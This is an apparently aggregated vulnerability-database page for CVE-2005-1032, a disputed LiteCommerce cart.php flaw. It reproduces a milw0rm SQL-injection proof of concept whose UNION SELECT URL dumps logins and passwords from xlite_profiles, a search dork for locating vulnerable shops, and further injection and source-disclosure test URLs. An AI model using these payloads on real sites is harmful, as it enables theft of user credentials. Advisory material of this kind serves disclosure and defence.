CVE-2005-1032
CVSS: N/A
Published: 2005-04-06 00:00:00
Modified: 2008-09-10 15:37:47

[Original] ** REJECT ** cart.php in LiteCommerce might allow remote attackers to obtain sensitive information via invalid (1) category_id or (2) product_id parameters. NOTE: this issue was originally claimed to be due to SQL injection, but the original researcher is known to be frequently inaccurate with respect to bug type and severity. The vendor has disputed this issue, saying "These reports are credited to malicious person we refused to hire. We have not taken legal action against him only because he is located in India. The vulnerabilities reported can not be reproduced, hence information you provide is contrary to fact." Further investigation by CVE personnel shows that an invalid SQL syntax error could be generated, but it only reveals portions of underlying database structure, which is already available in documentation from the vendor, and it does not appear to lead to path disclosure. Therefore, this issue is not a vulnerability or an exposure, and it probably should be REJECTED.


[CNNVD] CNNVD data is not yet available.



- CVSS (Base Score)

CVSS not yet available

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1032
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1032
(Official data source) NVD

- Other Links and Resources

- Vulnerability Information (4300)

litecommerce 2004 (category_id) Remote SQL Injection Vulnerability (EDBID:4300)
php webapps
2007-08-21 Verified
0 k1tk4t
N/A
########################################################################
# litecommerce Copyright © 2004 - Remote SQL Injection
# Vendor        : http://www.litecommerce.com/
# Found By      : k1tk4t - k1tk4t[4t]newhack.org
# Location      : Indonesia   --  #newhack[dot]org @irc.dal.net
# Dork          : Powered by LiteCommerce
########################################################################
POC;

http://localhost/cart.php?target=category&category_id=9999)union/**/select/**/concat(login,'-',password)/**/from/**/xlite_profiles/*

If this exploit succeeds, you will see an error message on the page, an error message containing SQL error information
that also reveals the "login" and "password" information in the xlite_profiles table.
This exploit probably does not work on the latest litecommerce [no error message]
########################################################################
Thanks to;
str0ke
arioo[nyubicrew] who provided the link
xoron,y3dips,mathdule,iFX,x-ace,nyubi,selikoer,k1ngk0ng
and all friends in the security&hacking community
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
all Indonesian hacker&security communities
love the Indonesian language

# milw0rm.com [2007-08-21]
		

- Vulnerability Information

15313
LiteCommerce cart.php Malformed target Parameter Script Source Disclosure
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public

- Vulnerability Description

LiteCommerce contains a flaw that may lead to an unauthorized information disclosure.  The issue is triggered when an attacker provides malformed data to the 'target' parameter of the cart.php script, which will disclose the source code for the script resulting in a loss of confidentiality.

- Timeline

2005-04-06 Unknown
2005-04-06 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related References

- Vulnerability Author

- Vulnerability Information

LiteCommerce Multiple SQL Injection Vulnerabilities
Input Validation Error 13044
Yes No
2005-04-06 12:00:00 2007-08-27 07:12:00
Discovery is credited to Diabolic Crab dcrab <dcrab@hackerscenter.com>.

- Affected Software Versions

LiteCommerce LiteCommerce

- Vulnerability Discussion

LiteCommerce is reportedly affected by multiple SQL injection vulnerabilities.

These vulnerabilities could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

All versions of LiteCommerce are considered to be affected at the moment.

- Exploit

An exploit is not required.

The following proof of concept examples are available:

http://www.example.com/test/cart.php?target='PHP_SCRIPT_EXPOSUREPHP_SCRIPT_EXPOSURE

http://www.example.com/test/cart.php?target=category&category_id='SQL_INJECTION

http://www.example.com/test/cart.php?target=product&product_id='SQL_INJECTION&category_id=246

- Solution

The vendor released patch 'lc_security_fix_20070824.zip' to address these issues. Please contact the vendor for information on how to obtain and apply this update.

- Related References

 

 
